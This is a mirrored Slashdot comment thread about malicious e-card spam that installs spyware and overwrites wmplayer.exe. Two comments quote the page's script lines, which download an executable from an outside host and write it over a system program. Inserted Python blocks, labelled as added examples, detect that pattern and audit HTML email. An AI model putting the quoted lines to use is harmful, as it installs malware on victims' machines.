Slashdot Mirror


Malicious E-Cards - An Analysis of Spam

smashr writes "I ran across this article the other day which is a rather clear analysis of a piece of malicious spam the author received. While most of us simply hit the delete key, the author has taken the time to see exactly what is going on when an innocent user clicks on one of these fake e-cards that are going around. From Russian spyware sites to over-writing wmplayer.exe this particular piece of spam is a rather nasty one."

58 of 482 comments

  1. I hate ecards by jwthompson2 · · Score: 5, Insightful

    This definitely could be a nasty little thing, thanks to poor security on remote executables. Wouldn't modification of default internet security settings go a long way to resolve this particular instance? Of course as a Mac user I don't have much to worry about with this.

    Does anyone else think that our society is overdue on becoming fed up with all these sort of things?

    ---
    Mod me down, I'm already -1...woot!

    --
    Even if I knew that tomorrow the world would go to pieces, I would still plant my apple tree. -Martin Luther
    1. Re:I hate ecards by ONOIML8 · · Score: 5, Insightful

      "Of course as a Mac user I don't have much to worry about with this."

      Perhaps you should. Most windows users are somewhat prepared for things like this because it's become a matter of routine. (sick as that is).

      But the average Mac or Linux user wouldn't know what hit 'em. It's good for us to stay alert, be cautious, worry a bit.

      --
      . Quit playing Monopoly with Bill. Switch to one of many non-Microsoft products today.
    2. Re:I hate ecards by jwthompson2 · · Score: 2, Insightful

      I agree. I have all my security settings turned to an appropriate level. With the exception of trusted sites, everything that happens requires my acceptance, so I am personally fairly safe, as far as I can be proactively. I can't say this with any certainty but other than IE do any other browsers allow installation of a remote file at all, let alone over top of an existing file? Plug-ins don't autoinstall on my Mac and javascript and Java run in a 'protected box' that limits their access to the system if I recall correctly. So this sort of thing really isn't an issue if all of that is as I believe.

      --
      Even if I knew that tomorrow the world would go to pieces, I would still plant my apple tree. -Martin Luther
  2. Frightening by JackBuckley · · Score: 5, Insightful

    This is a fascinating bit of detective work that should serve as a reminder to all careless users (especially Windows ones) that *SPAM IS NOT BENIGN*. It's not just annoying ads for penile implants--it can be downright dangerous to your PC.

    1. Re:Frightening by Alizarin+Erythrosin · · Score: 4, Insightful

      Quite right. Not only can it be dangerous to your PC or bank account (if they install a key logger too, for example), but stuff like this steals your bandwidth, which some people in this world still pay for by amount, not a flat rate.

      Hopefully Microsoft, with their new stance on spam and "security" (not to be flamebait but they really haven't made me trust them yet), will get their act together and realize that there need to be substantial changes to the way they go about things in order to combat these problems.

      --
      There are only 10 kinds of people in this world... those who understand binary and those who don't
    2. Re:Frightening by harmonica · · Score: 4, Insightful

      Hopefully Microsoft, with their new stance on spam and "security" (not to be flamebait but they really haven't made me trust them yet), will get their act together and realize that there need to be substantial changes to the way they go about things in order to combat these problems.

      I don't think they want to make substantial changes. It's convenient for the user having everything on by default, new users having admin privileges, and so on. Microsoft employs some very smart people. If the company was serious about good security, they could have changed things.

      But that would make everything harder for the end user. MS made a conscious decision against that. The statements about being really serious about security now which come up now and then are just cheap talk.

  3. Re:e-cards by bad+enema · · Score: 3, Insightful

    Yes, but they do cost a person their time. Not very much, but I think it can be safely said that most e-cards are more fun to receive than normal greeting cards. And the quality of the e-card depends on how long the person has spent to pick it out.

  4. AOL Falling behind? by Faith_Healer · · Score: 2, Insightful

    Any one else notice that the mail is originaly from a compuserve address? I thought that the new AOL was suposed to be safe? =)

    --
    Faith_Healer -- The antethsis to almost everything, and the worlds worst speller.
    1. Re:AOL Falling behind? by scambaiter · · Score: 2, Insightful

      It actually isn't. A lot of spam has forged headers to look like it's coming from compuserver.com, aol.com, hotmail.com or microsoft.com. Never seen any of the given IPs resolve to one of those domains though.

      --
      sick of sigs... *sigh*
  5. It'd be scary if I ran my PC as Administrator... by gfecyk · · Score: 2, Insightful

    ...and if I was stupid enough to actually install the crapware the strange website/email/stranger gave me.

    --
    Use Evolution instead of Outlook? Bewa
  6. Re:Spam in Outlook by Anonymous Coward · · Score: 5, Insightful

    1. It's viruses. 2. Yes, if the exploit in question has not yet been patched.

  7. At what point by GigsVT · · Score: 5, Insightful

    Does this stuff get treated like a virus/trojan, rather than legitimate business?

    If that Osama Bin Laden AIM virus isn't a virus, then I don't know what is. Yet I don't see news stories about the FBI or SS arresting the people that wrote it, even though they are more or less out in the open.

    It seems the rule lately is if you have a commercial intent, then it's OK for you to write viruses and trojans (like weatherbug).

    People actually get pissed off when we tell them they can't have weatherbug on their computer.

    --
    I've had enough abrasive sigs. Kittens are cute and fuzzy.
  8. Are there really better alternatives??? by TopShelf · · Score: 3, Insightful

    The author recommends moving away from Outlook and Internet Explorer, but in reality, is that just recommending "security through obscurity"? Are packages like Firebird really more secure, or is it just that black hats like this are going after the 90%+ out there using MS products due to the size of opportunity?

    Not trolling, just asking an honest question here.

    --
    Stop by my site where I write about ERP systems & more
    1. Re:Are there really better alternatives??? by jfengel · · Score: 5, Insightful

      Security through obscurity never works, but there is something to be said for security through diversity. It works because it lowers the "payoff" of writing worms, perhaps to the point where it's no longer worth the effort.

      Without an exhaustive code analysis of Outlook I can't say for certain, but Outlook has a lot of code in it that dates back before malicious worms became a daily occurrence. Because of that, the code seems to have been written with other goals than security in mind.

      I don't mean that to insult MS; it's only in the last five years or so that "absolutely MUST be secure" has been a real consideration for any vendor. Look at Windows 95's silly logon procedures. Before that, many features were added that were dangerous but, in Microsoft's opinion, useful. At least it made a spiffy demo to have systems administrators updating every desktop in the office just by sending email.

      Firebird, etc. have been written in a rather more paranoid age. I'm certain that there are potentially disastrous bugs in it. In this case I have read the code, and I've found a lot of nice defensive programming, but that doesn't preclude mistakes that the authors, me, and a thousand others might all have missed.

      Still, having been written for security from the ground up, with no silly code-executing features and strings all well protected from buffer overruns, I'm putting my faith in the ground-up rewrite that is Firebird/fox to Microsoft's apparently slapdash Outlook/IE combo.

      Microsoft appears to be improving its code, not least because of the withering hail of worms thrown at it because it's the market leader and therefore has the biggest payoff. These days worms all seem to depend not on security holes but on user stupidity or user laziness. This particular article is pointing out a worm that propagates through well-known, and supposedly well-patched, techniques. But there are obviously people out there on whom it works.

      Eventually, Microsoft will have to fix both user stupidity and user laziness in code. Eventually, any new program you receive is going to have to have a system administrator's explicit authorization to run or install itself for the first time. Even "sandboxed" environments like Java can't prevent a user from running an executable and doing at least limited damage. I suspect that someday, code will simply not be authorized to run at all without more than a mouse click between you and ruin.

  9. Conclusions by kyshtock · · Score: 5, Insightful
    I believe that there are at least 2 conclusions here:

    1. Clicking can be dangerous.

    2. If an operating system is that badly designed so one can actually overwrite an executable only by visiting a web page, then it's time to change the security settings.

    --
    Bite my shiny metal... oops... Nevermind!
  10. Turn off HTML viewing in your email client! by turnstyle · · Score: 5, Insightful
    I've said it before, and it's worth repeating... turn off HTML viewing in your email client, and do it now!

    It's an easy way to protect yourself from all sorts of stupid stuff.

    Ahem, turn off HTML viewing in your email client NOW.

    --
    Here's what I do: Bitty Browser & Andromeda
    1. Re:Turn off HTML viewing in your email client! by pldms · · Score: 4, Insightful

      There are many cases where you can communicate more -- and I don't mean a marketing message -- with pictures plus words than you can with just word

      Ok, but that doesn't require html; MIME can do this fine. In fact it's better since the image is part of the message,

      --
      Slashdot looked deep within my soul and assigned
      me a number based on the order in which I joined
    2. Re:Turn off HTML viewing in your email client! by Anonymous Coward · · Score: 3, Insightful

      Switch off HTML formatting for Outlook.

      Hah. If that would be the only problem with Outlook.

    3. Re:Turn off HTML viewing in your email client! by misleb · · Score: 5, Insightful
      But in terms of real, non-technical end-users, HTML is what's out there.

      The point is, attaching pictures to email has absolutely nothing to do with HTML. "Non-technical end-users" don't compose HTML that references pictures because it requires having a Web server to serve the pictures. All you are really going to get out of HTML in an email is varied fonts and colors. As neat as that might be, it is hardly enhanced communication. Nor is it worth the risks.

      95% of the HTML email I get is spam. The other 5% is messages from mailing list subscriptions or Amazon or whatever. Most of those come with both plain text and HTML. If nothing else, most "nontechnical end-users" would do good to turn off HTML so they won't have to look at offensive porn spam with obscene images (not attachments).

      -matthew

      --
      "THERE IS NO JUSTICE, THERE IS ONLY ME." -Death
    4. Re:Turn off HTML viewing in your email client! by Erik+Piper · · Score: 4, Insightful

      Ummm... because you're an ordinary mortal and don't have your own webspace somewhere, perhaps?

      Because, in the case I was describing, tech support, having the image integrated into the message -- like saying "click [picture of button]" instead of "click the button that looks like Bugs Bunny on speed" or whatever is a lot more helpful?

      A LOT of damn good reasons. It is indeed supposed to be a *good* thing.

      Erik
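
The distinction argued over in the thread above (an image carried inside the message as a MIME part versus HTML that makes the mail client fetch something from a remote server) can be checked mechanically. The following is an added example, not part of the original thread: it parses a constructed message with Python's standard `email` package, returns the plain-text part a client with HTML viewing turned off would show, and lists what the HTML part would load on render. All addresses and hosts are constructed placeholders.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser

AUTOLOAD_ATTRS = {"src", "background", "data"}   # fetched on render, no click needed
ACTIVE_TAGS = {"script", "object", "embed", "iframe", "applet"}


class HtmlPartAudit(HTMLParser):
    """Collects auto-loaded references and active-content tags from an HTML body."""

    def __init__(self):
        super().__init__()
        self.remote, self.cids, self.active = [], [], []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.active.append(tag)
        for name, value in attrs:
            if name not in AUTOLOAD_ATTRS or not value:
                continue
            lowered = value.lower()
            if lowered.startswith("cid:"):
                self.cids.append(value[4:])          # image shipped inside the mail
            elif lowered.startswith(("http://", "https://", "//")):
                self.remote.append(value)            # fetched from a remote server


def audit_message(raw_bytes):
    """Return the safe text to display plus what the HTML part would pull in."""
    msg = message_from_bytes(raw_bytes, policy=policy.default)
    plain = msg.get_body(preferencelist=("plain",))
    html = msg.get_body(preferencelist=("html",))
    audit = HtmlPartAudit()
    if html is not None:
        audit.feed(html.get_content())
    # Content-IDs of parts that really are attached to this message
    attached = {p["Content-ID"].strip("<>") for p in msg.walk() if p["Content-ID"]}
    return {
        "display_text": plain.get_content().strip() if plain is not None else None,
        "remote_fetches": audit.remote,
        "inline_images": [c for c in audit.cids if c in attached],
        "dangling_cids": [c for c in audit.cids if c not in attached],
        "active_tags": audit.active,
    }


def build_sample():
    """Constructed sample: plain part, HTML part, and one inline image part."""
    msg = EmailMessage()
    msg["From"] = "cards@example.invalid"
    msg["To"] = "user@example.invalid"
    msg["Subject"] = "You have received an e-card"
    msg.set_content("You have an e-card. Press the button shown in the attached image.")
    msg.add_alternative(
        "<html><body>\n"
        '<img src="cid:button1@example.invalid">\n'
        '<img src="http://tracker.example.invalid/open.gif?id=42" width="1" height="1">\n'
        '<script src="http://cards.example.invalid/card.js"></script>\n'
        "</body></html>\n",
        subtype="html",
    )
    # Turn the HTML alternative into multipart/related and attach the image to it
    msg.get_payload()[1].add_related(
        b"\x89PNG\r\n\x1a\n", "image", "png", cid="<button1@example.invalid>"
    )
    return msg.as_bytes()


if __name__ == "__main__":
    for key, value in audit_message(build_sample()).items():
        print(f"{key}: {value}")
```

Only the `cid:` image travels with the message; the tracker image and the script are the parts that disappear when HTML viewing is switched off.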

  11. Stay on your toes by J.+Jacques · · Score: 5, Insightful

    This story is just more proof that people need to be proactive about their email and internet browsing habits. The biggest reason that so many people fall for this sort of crap is that they expect their computer to "Just Work", like their TV or microwave. It'd be nice if PCs DID Just Work, but unfortunately it's not the case. If more Windows users would just take the time to check out more secure browsers and email clients, and be more careful about which emails they open and attachments they download, spammers would have a much harder job. It sounds really obvious to anyone savvy enough to read Slashdot, but this really isn't something that occurs to 90% of the people who own a computer.

    --
    http://www.questionablecontent.net
  12. I hate spam by nycsubway · · Score: 5, Insightful

    I would love to eliminate it. To me, it's a complex engineering problem to get rid of it. The problem is presented as this:

    - spam is cheap to produce
    - a sucker is born every day
    - even if 70% of the spam sent out doesn't get to its destination, millions of messages will still be received
    - spam filters are not installed on all mail servers
    - spam is CHEAP to produce (again)

    Cost is what stops junkmailers from filling postoffice mailboxes. Cost is the biggest barrier to preventing spam. It costs $0.20 to send a bulk mail item through the postoffice, it can get expensive if you want to send millions of junk mails.

    How can email on the internet remain free/cheap and still not allow spam to run rampant?

    1. Re:I hate spam by mog · · Score: 2, Insightful

      I was under the impression that the rate of production of suckers was one per minute. Have we made headway in stemming this epidemic?

  13. Re:Don't run ActiveX as Administrator, simple. by glenrm · · Score: 3, Insightful

    Huh, so what if you are running as admin, why would I want a web page to overwrite .exe files without asking permission? In the race to keep up with Java some very unsafe things were done with ActiveX...

  14. Ugly is what ugly does by broothal · · Score: 5, Insightful

    This looks pretty ugly:

    x.Open("GET", "http://adversting.co.uk/a.exe",0);

    and should never have been implemented in a browser. After all, it's not a browsers task to launch files. I remember thinking this back when Windows Explorer and Internet Explorer merged into one (you can actually type URLs in your windows explorer window). <Comic book guy> Worst idea .. ever </Comic book guy>

  15. Re:Don't run ActiveX as Administrator, simple. by jdhutchins · · Score: 4, Insightful

    Most windows users end up running as admin. Many windows programs need to be admin to run, and people get fed up with this, so they just run everyone as admin.

  16. Re:Don't run ActiveX as Administrator, simple. by dAzED1 · · Score: 4, Insightful
    that simple? Really?

    My wife had to use MS office for something, so I installed XP on one of my laptops for her. It wanted to add a user. I put her name in.

    Gosh, whatya know...it made her an admin. Yeah, default behaviour. That's peachy. The problem is what the normal people will do.

    for the normal user, the win98 lack of security has not changed in XP. Still there. And activeX is enabled by default as well.

  17. Re:Spam in Outlook by dave420-2 · · Score: 5, Insightful
    The real problem isn't the technology, but the users. The same principle behind users opening unknown attachments also exhibits itself in the form of people deleting their windows directory.

    Windows, through its near-global adoption and ease-of-use (you can argue the point, but as 98% of desktops are windows, it's a weak argument) has users of every technical ability. It has the users too dumb to use linux. Those guys are the ultimate trojan horse. They just sit there, willingly running anything given to them. It's akin to a dumbass in front of a linux machine, and someone tells them to type in "rm -rf /" as root. It's not the technology's fault, but the user's.

    The reason we don't see as much of this happening on linux isn't solely due to the fact linux is more secure, but because what disruption would be caused by it? Making a linux virus isn't such an accolade as a Windows one, as you can bet it's not going to be on the news when released. The same goes for Macs. The most popular and wide-spread software is always the first to get its copy-protection removed, the first on FTP sites, and the first with known exploits.

    Remember "security through obscurity"? Well, the reverse applies, too.

  18. Re:The most frightening bit here by FSWKU · · Score: 3, Insightful

    Actually, there are legitimate uses for ActiveX. One example being the Remote Desktop Web Client. It's a simple little ActiveX control that lets you log into your computer without having to install the terminal services client. While I would love to be able to get rid of that, it really isn't possible. The "engineer" where I work is a paranoid dolt who insists that no one should ever be allowed to install anything on any of the computers in the office (including popup killers...imagine the horror) and won't upgrade the machines (933mhz systems) to anything higher than Win98. Come to think of it, it's somewhat of a miracle that I can even remote into my system at all from there.

    --
    "So after all this, you make my case for me. To end this stalemate, you must die..."
  19. Re:Spam in Outlook by 77Punker · · Score: 2, Insightful

    As long as there's a hole in Outlook allowing arbitrary code exploits, you're screwed. Even if your box is fully upgraded, that just means that you're safe from the ones MS has bothered to fix so far. Even so, there's probably even more exploits yet to be discovered or created by a poorly coded patch.

  20. Re:Redundant, I know. Don't run as Administrator. by reuben04 · · Score: 2, Insightful

    I agree with your statement, but many of the windows based line of business applications out there "require" administrative privileges to run properly, forcing users to have administrative permissions. This is also an issue that I have not seen people thinking about lately.

  21. Amazing, really by mao+che+minh · · Score: 4, Insightful
    It still amazes me that people (the average user, I should say) can not grasp the reality of the Internet: your system, in the safe confines of your home, is connected to a network of billions. Anyone capable of reaching the Internet can reach your system. The world is full of villains.

    And yet a person that has been surfing the web and using email for the past 6 or 7 years is still shocked when they click on Britney's Web Cam XXX HOT Pics and end up with a phone bill of $500 for dialing the Hot Russian Wives Club.

  22. Re:The most frightening bit here by SlashDread · · Score: 3, Insightful

    Well if Rise Of Nations((C) MS) would just run WITHOUT being an admin, I'd switch to a normal user in a blink..

    "/Dread"

  23. Re:Redundant, I know. Don't run as Administrator. by JTunny · · Score: 2, Insightful

    Switching between user levels on windows isn't as simple as it is on a *nix machine. The time/memory overhead switching would send me crazy.

  24. Re:Redundant, I know. Don't run as Administrator. by rbanzai · · Score: 3, Insightful

    Okay, run as a Regular User under Win XP.

    Watch as your McAfee antivirus now fails to autoupdate. Find out about it when all the users at your company get the latest virus because they are three months behind the update schedule.

    Wheee!

    Running as a "Regular user" does not work because too much common Windows software will not run properly under anything but "admin" rights.

  25. Launching Files by ticklemeozmo · · Score: 2, Insightful

    Actually, at one point in time (DotCom boom maybe?, remember "Active Desktop", the whole point of "portals") the browser was SUPPOSED to do anything and everything. Your browser was supposed to be your desktop and that's how you'd do stuff.

    That was the point of a "home page", you could get your news and start up Word all on the same page.

    --
    When modding "Informative", please make sure it both has a source and IS actually informative.
  26. Re:Spam in Outlook by Swanktastic · · Score: 2, Insightful

    As long as there's a hole in Outlook allowing arbitrary code exploits, you're screwed. Even if your box is fully upgraded, that just means that you're safe from the ones MS has bothered to fix so far. Even so, there's probably even more exploits yet to be discovered or created by a poorly coded patch.

    Of course, it could be pointed out that this is true for any piece of software.

    It's sort of a truism-- if a cracker is aware of an exploit that the OSS community does not know about, then your linux/BSD box is not secure either.

    I think the real answer to the Original Poster's question is "Probably not." It seems to me that 99% of viruses use public, well known exploits to compromise unpatched systems. It seems to be a much rarer occurrence where some black hat out there discovers the exploit and crafts a successful worm/virus/whatever around it.

  27. E-cards are EVIL by rqqrtnb · · Score: 5, Insightful
    Why do people still insist on using e-cards?

    They are spam harvesters. Nothing more.

    I go to great lengths to avoid having my email reach spammer lists. But it only takes one person to screw that email address by submitting it to an e-card spammer.

    Do I need to attach a note to my emails?

    If you are thinking of sending me an e-card:
    • I will be changing my email address again, much to the chagrin of everyone else.

    • Since you have proved incapable of not providing spammers with my personal email address, you will NOT be receiving the new one.

    • You are now limited to traditional (non 21st Century) forms of communication with me.

    What possesses people to do it?

    Are they too busy to write me something personal? Do they feel they cannot express their greeting in words? Do they not understand how to attach images? Maybe they actually hate me...

    Bastards.

    1. Re:E-cards are EVIL by cybergrue · · Score: 4, Insightful

      Why do people still insist on using e-cards?
      What possesses people to do it?

      Because they think that it is exactly the same as sending you a physical card, just updated for the 21st century. They have absolutely no idea that there can be a down-side to these things because they are thinking of it in terms of a physical card. They are probably thinking that since you use a computer a lot, then you will like to see a greeting card on your computer. I know, I have a lot of relatives that have done this in the past, and it took a lot of explaining to them why this was a really bad idea.

  28. Re:Redundant, I know. Don't run as Administrator. by 0123456 · · Score: 3, Insightful

    "The same thing can happen to an idiot running Mozilla under Linux as root,"

    Except:

    a) as far as I'm aware, most or all Linux distributions will create you a new non-admin user account rather than logging you on as a root user by default.

    b) thanks to the wonder of modern miraculous setuid technology, there's no need to log on as root to run the majority of programs. About the only time I log on as root on Linux is to install apps or update kernels.

    c) thanks to the wonder of modern miraculous 'su' technology, you can run as root in one window while logged on as your normal user account. As far as I'm aware, that's impossible in Windows, requiring you to log out and log back on as Administrator.

    Those are just three reasons why most people run as Administrator on Windows and don't on Linux.

  29. Re:Redundant, I know. Don't run as Administrator. by ktulu1115 · · Score: 3, Insightful

    You seem to be missing the point. Browsers shouldn't allow this:

    x.Open("GET", "http://adversting.co.uk/a.exe",0);
    s.SaveToFile( "C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
    etc...

    This is the problem with IE. Running as admin/root isn't a good idea in general, you are correct, but that's not an excuse for IE's pisspoor security.

    --
    # fuser -v /dev/attention | grep work
    #
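
The two script lines quoted in the comment above make a recognisable pair: a GET of a remote executable followed by a write over a local executable. As an added example that is not part of the original thread or of the analysed article, here is a static check a mail or proxy filter could run over page or message markup before it reaches a browser. The function names and the benign sample are constructed; the flagged lines are the ones quoted in the thread.

```python
import re
from urllib.parse import urlparse

# The two calls quoted in the thread: .Open("GET", url, ...) and .SaveToFile(path, ...)
OPEN_RE = re.compile(r'\.Open\(\s*"GET"\s*,\s*"([^"]+)"', re.IGNORECASE)
SAVE_RE = re.compile(r'\.SaveToFile\(\s*"((?:[^"\\]|\\.)+)"', re.IGNORECASE)
EXEC_EXT = (".exe", ".dll", ".scr", ".pif", ".bat", ".cmd")


def unescape_js(literal):
    """Collapse script string escapes such as \\\\ into a single backslash."""
    return re.sub(r"\\(.)", lambda m: m.group(1), literal)


def is_executable(name):
    return name.lower().endswith(EXEC_EXT)


def scan_markup(text):
    """Return (kind, detail) findings for fetch-and-write patterns in markup."""
    urls = [m.group(1) for m in OPEN_RE.finditer(text)]
    paths = [unescape_js(m.group(1)) for m in SAVE_RE.finditer(text)]

    # Judge the URL by its path component, so a host name never counts as an extension
    fetched = [u for u in urls if is_executable(urlparse(u).path)]
    written = [p for p in paths if is_executable(p)]

    findings = [("remote-executable-fetch", u) for u in fetched]
    findings += [("local-executable-write", p) for p in written]
    if fetched and written:
        # Both halves in one document: content is downloaded and dropped over a program
        findings.append(("download-and-overwrite", f"{fetched[0]} -> {written[0]}"))
    return findings


# Sample input: the lines quoted in the thread, wrapped in constructed markup
SAMPLE_PAGE = r'''<html><body><script>
x.Open("GET", "http://adversting.co.uk/a.exe",0);
s.SaveToFile( "C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
</script></body></html>'''

# Constructed benign sample: a GET of a data file, nothing written to disk
BENIGN_PAGE = '<script>x.Open("GET", "http://example.invalid/news.xml", 0);</script>'


if __name__ == "__main__":
    for kind, detail in scan_markup(SAMPLE_PAGE):
        print(f"{kind}: {detail}")
    print("benign findings:", scan_markup(BENIGN_PAGE))
```

A literal-string match like this misses obfuscated or concatenated strings, so it serves as a cheap first filter rather than a replacement for disabling the scripting path itself.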
  30. Security through obscurity DOES work by Kombat · · Score: 3, Insightful

    Security through obscurity never works

    Hogwash. There are plenty of examples where "Security through obscurity" works just fine. Take, for example, Timothy McVeigh's execution. It took place in Indiana, but due to the large number of victims' families who wished to view the execution in Oklahoma, and who couldn't travel, the execution was broadcast via a closed-circuit satellite link to a gymnasium in Oklahoma. There was an extremely strong demand for the general public to tap into that feed. Hackers everywhere could have made an enormous name for themselves if they'd been able to intercept and decrypt that signal. But, since neither the specifics of the transmission of the signal, nor the encryption method used were ever made public, no one captured the signal, and a search for "Timothy McVeigh Execution" on Kazaa returns 0 results. Security through obscurity worked in this example.

    Here's another example. Do you have any idea about the internal layout of the Pentagon? Of course not. The floor plans are top secret. The locations of secret escape hallways are all top secret. The knowledge is "obscured." And consequently, the Pentagon has never been physically broken into. If all you naive "openness is more secure" zealots had your way, then the entire schematic of the Pentagon, Whitehouse, NORAD, and everything else would be all over the net, for us "White hats" to scrutinize and improve. Unfortunately, we'd all argue over what the "right" way to do things would be, and meanwhile, bin Laden's disciples would be delivering suicide-bomb-after-suicide-bomb to Bush's bedside.

    I admit that "Security through obscurity" is not a silver bullet, and in many cases, is less desirable than open approaches. However, it is obvious that neither is your suggestion that open solutions are always best, correct. It should be clear to even the most fervent zealot that sometimes, a layer of obscurity is appropriate, and enhances the security of a situation that has already been thoroughly scrutinized by a variety of experts.

    --
    Like woodworking? Build your own picture frames.
  31. Re:The most frightening bit here by just+fiddling+around · · Score: 2, Insightful

    Another flaw: I get to check "always trust Hackerboy" box, but there is no "never trust Hackerboy" box for me to check. Would work wonders on my blood pressure...

    --
    You're not old until regret takes the place of your dreams.
  32. NO, it's the INTERFACE. by tentimestwenty · · Score: 2, Insightful

    I agree the users are a big problem, but the technology is horrible too, not just in Windows but all OSes. The Mac is the only system that balances the user's need to accomplish things with the protection to not do something catastrophic. It doesn't do this through tons of "Are you sure..." dialog boxes, or with Orwellian security routines, and not even through add-on programs which check up on viruses and backups.

    The Mac simply has a user interface that allows you to do the things you want to do. It sounds simple, but most Mac users don't ever get to the point of confusion where they might do something stupid. The terminal isn't right there on the desktop, it's not even in the Applications folder. It's in a folder called Utilities. The Windows folder is such a generic name, it's a likely candidate to be "cleaned out" by a curious user. On the Mac it's called System which has an obvious connotation that it's important to running your computer. I could go on and on.

    The interface of the machine is the easiest way to educate users. Make it intuitive and even a novice is going to play safe.

  33. Probably an autoproxy, not a virus by philg · · Score: 2, Insightful

    I was analyzing something very similar around October of last year when I worked here. They probably aren't installing a virus, per se -- more like an autoproxy which they will use to send spam or install more malware (e.g., to steal passwords or credit card numbers).

    All the vulnerabilities mentioned in the article have been known for quite some time. Liu Die Yu's Unpatched IE vulnerabilities page documents several of these in detail, with exploit examples. (Note that some of the links on Liu Die Yu's site may result in popups, ironically.)

    When I took a look at it, the proxy flavor of the month was most commonly referred to as ap216.exe (the filename is irrelevant, obviously). A good description of it is here, in the context of its use in a phishing scam.

    Note that everything done in this attack will blithely go through most firewalls -- almost all connections are initiated from within the network. Firewalls are an increasingly inadequate means of protecting users from organized and motivated attackers. IMO, any network admin who doesn't run deep-packet inspection firewalls, intrusion prevention, or security-minded filtering application proxies is asking for it.

    Sure, someone could write something to quietly delete all the files on your hard drive. I'm sure he'd rather have all the spam your machine can send, or all the money from your bank account.

    phil

  34. patching by Metaldsa · · Score: 3, Insightful

    Isn't it funny how we have people complaining how windows auto-update can download patches automatically into users machines and how this is dangerous but at the same time we blame these windows users for not updating their pcs. So when you have tens of millions of windows pcs would you rather MS update them automatically or not? This is probably a dumb question because I bet the /. crowd is divided on it as a matter of privacy and annoyance.

  35. Re:Redundant, I know. Don't run as Administrator. by just+fiddling+around · · Score: 2, Insightful

    So the solution to stupid system design is rewarding stupid system designer by buying a new version?!? No sane person would do that for a car! I am certain nobody would have bought a Pinto II because the Pinto was "supported no more and it is their fault they still drive an exploding car because the new version is all right".

    --
    You're not old until regret takes the place of your dreams.
  36. Re:The most frightening bit here by kisrael · · Score: 3, Insightful

    You know, that kind of asymmetry shows up a few places in Windows, and it's always annoying.

    Like, I think it's a File Replace dialog, "Yes" / "Yes to All" / "No" / "Cancel"

    Why is there "No to All"? It's not quite as useful as "Yes to All", but you could easily think of some scenarios where you want to add in new files but don't want to try and overwrite any files that are already there...

    --
    SO YOU'RE GOING TO DIE: The Comic for Dealing with Death
  37. Re:OR by RetroGeek · · Score: 5, Insightful

    You could just simply not view messages from people you don't know.

    Otherwise known as a white list.

    Yes, these work, but part of the utility of the email system is that you CAN get messages from unknown people. I read your email address at some interesting site (slashdot?) and I want to have a one2one conversation with you. So I send you an email. You don't know me from anyone, yet we can have a discussion about something without the entire world being privy to it.

    And this is the real bad effect that SPAM has created. We no longer trust strangers.

    Sigh...

    --

    - - - - - - - - - - -
    I am a programmer. I am paid to produce syntax not grammar. Deal with it.
  38. Hey, it had a EULA... by MadAnthony02 · · Score: 2, Insightful

    The buddylinks spyware that the OP refers to actually pops up a box, complete with a link to a EULA, to accept or stop the install.

    The text of the EULA lists all the stuff that it does - send ads out to other people on your buddy list with no action on your part. And yet people agreed to it. And in general, shrink wrap/click wrap licenses have been held as legal.

    The problem is once again human nature - people are used to clicking yes on those boxes because they were originally for stuff you actually needed to view a webpage (Windows Update, shockwave and flash plugins, etc.). People don't bother reading them, just click yes, and wind up installing toolbars, gator, weatherbug, bonzibuddy, and the rest of that crap.

  39. Re:Yes , indeed! by ONOIML8 · · Score: 2, Insightful

    If you've never heard of a Linux or Unix program or script being compromised, you lead a sheltered life. So you review the source from start to finish before you compile and only run binaries from a trusted source...which of course could never be compromised. Great.

    And I know that it's impossible to find any flaws in Linux based software that could be taken advantage of by someone of ill intent. But I'm not sure that the malicious coders recognize that as truth.

    But as the user base grows there are more and more users who aren't as cautious as you. And, as the user base grows, there will be more of those sick fscks looking to cause you harm.

    --
    . Quit playing Monopoly with Bill. Switch to one of many non-Microsoft products today.
  40. Re:Yes , indeed! by Viol8 · · Score: 2, Insightful

    Sorry, I'm a bit confused. Please tell me how a mail program that only deals with plain text can be compromised? When you've done that then tell me how a binary will get run without me knowing it via email. And after that explain why I would be dumb enough to run ANY executable from an unknown source that had not been suitably verified first and even then why exactly would I run them as root user so they could do some serious harm without testing it in a chroot jail first?

  41. I'm quite sure... by Kjella · · Score: 5, Insightful

    I don't think they want to make substantial changes. It's convenient for the user having everything on by default, new users having admin privileges, and so on. Microsoft employs some very smart people. If the company was serious about good security, they could have changed things.

    But that would make everything harder for the end user. MS made a conscious decision against that. The statements about being really serious about security now which come up now and then are just cheap talk.


    ...that Microsoft really would like to change it. They're not exactly too happy about their reputation for spam etc. The real issue is that consumers don't want security - oh they say they do but they don't. They just want to have their cake and eat it too.

    Users expect being able to double-click a file and have an application run or install itself - yet they would like it not to happen when they do the exact same with a virus/trojan. They would like all their favorite programs to be allowed access the internet - and for all spyware/trojans to be blocked automatically. They would like for their files to be private - but not the hassle of identifying to the computer.

    It's as if they expect the computer to be a fucking telepath with a mind-boggling good AI. The real truth is that most people don't understand a computer worth shit. Sec-uh-rity even less.

    They're like a kid with a full chemistry set. They'll play around with it, and most of the time it's cool. Then they manage to make something toxic or explosive or worse, but somehow that's the chemistry set's fault and it simply shouldn't allow you to make anything dangerous.

    But try suggesting to them up front that they should get a "Chemistry kit for Kids" or "Chemistry kit for dummies" where it's reaaaally hard to screw up and they'll complain their wits out that it doesn't do what they want and that they're ready for the real deal and that they know what they're doing.

    So what do you do when grown men want to buy the full kit, even when you know it'll blow up in their faces? Refuse to sell it to them? Require a "driver's licence" of sorts? Don't tell me it'll all be better with Linux. Right now it's so hard, they won't use it at all, but by the time it gets easy enough that you expect everyone to manage their own desktop (as opposed to now, where you mostly need the local Linux guru), they will screw up their machines just as badly.

    Kjella

    --
    Live today, because you never know what tomorrow brings
  42. Re:Yes , indeed! by ONOIML8 · · Score: 3, Insightful

    First, you seem to consider yourself an "average user" which, from your comments, I can assure you that you are not. You're more educated, more aware of what goes on with your computer than the average person at the keyboard.

    I am not an expert in these things, so I won't bother to try to figure out how they can be done. I do know that much is possible. As an example, when I first left the BBS's and got on the internet I received an email warning me about an email going around that would wipe your hard drive clean if you opened it. I passed it on to my step-father, an engineer for the Navy working on a NASA base. He passed it around and I received several replies from Navy, NASA, USGS and Air Force computer experts who told me not to worry because such a thing just wasn't possible. Do you agree with them today? 100 years ago most experts would have told you that landing on the moon was not possible. Nor was breaking the sound barrier. Please don't limit your imagination. I can assure you that the sick fscks out there aren't so limited.

